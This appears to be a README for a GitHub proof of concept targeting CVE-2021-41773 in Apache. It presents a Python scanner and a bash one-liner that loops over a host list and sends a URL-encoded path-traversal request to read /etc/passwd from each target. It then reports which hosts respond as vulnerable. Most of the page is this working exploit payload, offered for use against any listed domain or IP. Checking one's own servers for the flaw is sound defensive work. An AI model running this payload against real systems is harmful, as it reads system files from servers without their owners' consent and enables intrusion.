CVE-2021-41773 Proof of Concept

Quick and dirty proof of concept for checking if hosts vulnerable to CVE-2021-41773

python3 poc.py hosts.txt

Where hosts.txt contains your targets:

domain.com
blah.com
192.168.1.1

It’ll print out if the host is vulnerable or not vulnerable.

Python version of bash:

cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Enjoy!

GitHub

https://github.com/ZephrFish/CVE-2021-41773-PoC